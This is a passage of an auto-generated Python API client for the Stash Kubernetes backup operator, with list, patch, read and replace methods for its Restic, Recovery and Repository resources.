def list_stash_appscode_com_v1alpha1_restic_for_all_namespaces(self, **kwargs): # noqa: E501
"""list_stash_appscode_com_v1alpha1_restic_for_all_namespaces # noqa: E501
list or watch objects of kind Restic # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.list_stash_appscode_com_v1alpha1_restic_for_all_namespaces(async=True)
>>> result = thread.get()
:param async bool
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: ComGithubAppscodeStashApisStashV1alpha1ResticList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.list_stash_appscode_com_v1alpha1_restic_for_all_namespaces_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_stash_appscode_com_v1alpha1_restic_for_all_namespaces_with_http_info(**kwargs) # noqa: E501
return data
def list_stash_appscode_com_v1alpha1_restic_for_all_namespaces_with_http_info(self, **kwargs): # noqa: E501
"""list_stash_appscode_com_v1alpha1_restic_for_all_namespaces # noqa: E501
list or watch objects of kind Restic # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.list_stash_appscode_com_v1alpha1_restic_for_all_namespaces_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: ComGithubAppscodeStashApisStashV1alpha1ResticList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['_continue', 'field_selector', 'include_uninitialized', 'label_selector', 'limit', 'pretty', 'resource_version', 'timeout_seconds', 'watch'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_stash_appscode_com_v1alpha1_restic_for_all_namespaces" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if '_continue' in params:
query_params.append(('continue', params['_continue'])) # noqa: E501
if 'field_selector' in params:
query_params.append(('fieldSelector', params['field_selector'])) # noqa: E501
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized'])) # noqa: E501
if 'label_selector' in params:
query_params.append(('labelSelector', params['label_selector'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
if 'resource_version' in params:
query_params.append(('resourceVersion', params['resource_version'])) # noqa: E501
if 'timeout_seconds' in params:
query_params.append(('timeoutSeconds', params['timeout_seconds'])) # noqa: E501
if 'watch' in params:
query_params.append(('watch', params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/restics', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ComGithubAppscodeStashApisStashV1alpha1ResticList', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_stash_appscode_com_v1alpha1_namespaced_recovery(self, name, namespace, body, **kwargs): # noqa: E501
"""patch_stash_appscode_com_v1alpha1_namespaced_recovery # noqa: E501
partially update the specified Recovery # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.patch_stash_appscode_com_v1alpha1_namespaced_recovery(name, namespace, body, async=True)
>>> result = thread.get()
:param async bool
:param str name: name of the Recovery (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoK8sApimachineryPkgApisMetaV1Patch body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: ComGithubAppscodeStashApisStashV1alpha1Recovery
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.patch_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(name, namespace, body, **kwargs) # noqa: E501
else:
(data) = self.patch_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(name, namespace, body, **kwargs) # noqa: E501
return data
def patch_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(self, name, namespace, body, **kwargs): # noqa: E501
"""patch_stash_appscode_com_v1alpha1_namespaced_recovery # noqa: E501
partially update the specified Recovery # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.patch_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(name, namespace, body, async=True)
>>> result = thread.get()
:param async bool
:param str name: name of the Recovery (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoK8sApimachineryPkgApisMetaV1Patch body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: ComGithubAppscodeStashApisStashV1alpha1Recovery
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'body', 'pretty'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_stash_appscode_com_v1alpha1_namespaced_recovery" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `patch_stash_appscode_com_v1alpha1_namespaced_recovery`") # noqa: E501
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `patch_stash_appscode_com_v1alpha1_namespaced_recovery`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `patch_stash_appscode_com_v1alpha1_namespaced_recovery`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json-patch+json', 'application/merge-patch+json', 'application/strategic-merge-patch+json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/recoveries/{name}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ComGithubAppscodeStashApisStashV1alpha1Recovery', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_stash_appscode_com_v1alpha1_namespaced_repository(self, name, namespace, body, **kwargs): # noqa: E501
"""patch_stash_appscode_com_v1alpha1_namespaced_repository # noqa: E501
partially update the specified Repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.patch_stash_appscode_com_v1alpha1_namespaced_repository(name, namespace, body, async=True)
>>> result = thread.get()
:param async bool
:param str name: name of the Repository (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoK8sApimachineryPkgApisMetaV1Patch body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: ComGithubAppscodeStashApisStashV1alpha1Repository
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.patch_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(name, namespace, body, **kwargs) # noqa: E501
else:
(data) = self.patch_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(name, namespace, body, **kwargs) # noqa: E501
return data
def patch_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(self, name, namespace, body, **kwargs): # noqa: E501
"""patch_stash_appscode_com_v1alpha1_namespaced_repository # noqa: E501
partially update the specified Repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.patch_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(name, namespace, body, async=True)
>>> result = thread.get()
:param async bool
:param str name: name of the Repository (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoK8sApimachineryPkgApisMetaV1Patch body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: ComGithubAppscodeStashApisStashV1alpha1Repository
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'body', 'pretty'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_stash_appscode_com_v1alpha1_namespaced_repository" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `patch_stash_appscode_com_v1alpha1_namespaced_repository`") # noqa: E501
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `patch_stash_appscode_com_v1alpha1_namespaced_repository`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `patch_stash_appscode_com_v1alpha1_namespaced_repository`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json-patch+json', 'application/merge-patch+json', 'application/strategic-merge-patch+json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/repositories/{name}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ComGithubAppscodeStashApisStashV1alpha1Repository', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_stash_appscode_com_v1alpha1_namespaced_restic(self, name, namespace, body, **kwargs): # noqa: E501
"""patch_stash_appscode_com_v1alpha1_namespaced_restic # noqa: E501
partially update the specified Restic # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.patch_stash_appscode_com_v1alpha1_namespaced_restic(name, namespace, body, async=True)
>>> result = thread.get()
:param async bool
:param str name: name of the Restic (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoK8sApimachineryPkgApisMetaV1Patch body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: ComGithubAppscodeStashApisStashV1alpha1Restic
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.patch_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(name, namespace, body, **kwargs) # noqa: E501
else:
(data) = self.patch_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(name, namespace, body, **kwargs) # noqa: E501
return data
def patch_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(self, name, namespace, body, **kwargs): # noqa: E501
"""patch_stash_appscode_com_v1alpha1_namespaced_restic # noqa: E501
partially update the specified Restic # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.patch_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(name, namespace, body, async=True)
>>> result = thread.get()
:param async bool
:param str name: name of the Restic (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoK8sApimachineryPkgApisMetaV1Patch body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: ComGithubAppscodeStashApisStashV1alpha1Restic
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'body', 'pretty'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_stash_appscode_com_v1alpha1_namespaced_restic" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `patch_stash_appscode_com_v1alpha1_namespaced_restic`") # noqa: E501
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `patch_stash_appscode_com_v1alpha1_namespaced_restic`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `patch_stash_appscode_com_v1alpha1_namespaced_restic`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json-patch+json', 'application/merge-patch+json', 'application/strategic-merge-patch+json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/restics/{name}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ComGithubAppscodeStashApisStashV1alpha1Restic', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def read_stash_appscode_com_v1alpha1_namespaced_recovery(self, name, namespace, **kwargs): # noqa: E501
"""read_stash_appscode_com_v1alpha1_namespaced_recovery # noqa: E501
read the specified Recovery # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.read_stash_appscode_com_v1alpha1_namespaced_recovery(name, namespace, async=True)
>>> result = thread.get()
:param async bool
:param str name: name of the Recovery (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: ComGithubAppscodeStashApisStashV1alpha1Recovery
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.read_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(name, namespace, **kwargs) # noqa: E501
else:
(data) = self.read_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(name, namespace, **kwargs) # noqa: E501
return data
def read_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(self, name, namespace, **kwargs): # noqa: E501
"""read_stash_appscode_com_v1alpha1_namespaced_recovery # noqa: E501
read the specified Recovery # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.read_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(name, namespace, async=True)
>>> result = thread.get()
:param async bool
:param str name: name of the Recovery (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: ComGithubAppscodeStashApisStashV1alpha1Recovery
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'pretty'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_stash_appscode_com_v1alpha1_namespaced_recovery" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `read_stash_appscode_com_v1alpha1_namespaced_recovery`") # noqa: E501
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `read_stash_appscode_com_v1alpha1_namespaced_recovery`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/recoveries/{name}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ComGithubAppscodeStashApisStashV1alpha1Recovery', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def read_stash_appscode_com_v1alpha1_namespaced_repository(self, name, namespace, **kwargs): # noqa: E501
"""read_stash_appscode_com_v1alpha1_namespaced_repository # noqa: E501
read the specified Repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.read_stash_appscode_com_v1alpha1_namespaced_repository(name, namespace, async=True)
>>> result = thread.get()
:param async bool
:param str name: name of the Repository (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: ComGithubAppscodeStashApisStashV1alpha1Repository
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.read_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(name, namespace, **kwargs) # noqa: E501
else:
(data) = self.read_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(name, namespace, **kwargs) # noqa: E501
return data
def read_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(self, name, namespace, **kwargs): # noqa: E501
"""read_stash_appscode_com_v1alpha1_namespaced_repository # noqa: E501
read the specified Repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.read_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(name, namespace, async=True)
>>> result = thread.get()
:param async bool
:param str name: name of the Repository (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: ComGithubAppscodeStashApisStashV1alpha1Repository
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'pretty'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_stash_appscode_com_v1alpha1_namespaced_repository" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `read_stash_appscode_com_v1alpha1_namespaced_repository`") # noqa: E501
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `read_stash_appscode_com_v1alpha1_namespaced_repository`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/repositories/{name}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ComGithubAppscodeStashApisStashV1alpha1Repository', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def read_stash_appscode_com_v1alpha1_namespaced_restic(self, name, namespace, **kwargs): # noqa: E501
"""read_stash_appscode_com_v1alpha1_namespaced_restic # noqa: E501
read the specified Restic # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.read_stash_appscode_com_v1alpha1_namespaced_restic(name, namespace, async=True)
>>> result = thread.get()
:param async bool
:param str name: name of the Restic (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: ComGithubAppscodeStashApisStashV1alpha1Restic
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.read_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(name, namespace, **kwargs) # noqa: E501
else:
(data) = self.read_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(name, namespace, **kwargs) # noqa: E501
return data
def read_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(self, name, namespace, **kwargs): # noqa: E501
"""read_stash_appscode_com_v1alpha1_namespaced_restic # noqa: E501
read the specified Restic # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.read_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(name, namespace, async=True)
>>> result = thread.get()
:param async bool
:param str name: name of the Restic (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: ComGithubAppscodeStashApisStashV1alpha1Restic
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'pretty'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_stash_appscode_com_v1alpha1_namespaced_restic" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `read_stash_appscode_com_v1alpha1_namespaced_restic`") # noqa: E501
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `read_stash_appscode_com_v1alpha1_namespaced_restic`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/restics/{name}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ComGithubAppscodeStashApisStashV1alpha1Restic', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def replace_stash_appscode_com_v1alpha1_namespaced_recovery(self, name, namespace, body, **kwargs): # noqa: E501
"""replace_stash_appscode_com_v1alpha1_namespaced_recovery # noqa: E501
replace the specified Recovery # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.replace_stash_appscode_com_v1alpha1_namespaced_recovery(name, namespace, body, async=True)
>>> result = thread.get()
:param async bool
:param str name: name of the Recovery (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param ComGithubAppscodeStashApisStashV1alpha1Recovery body: (required)
:param str pretty: If 'true', then the output is pretty printed.
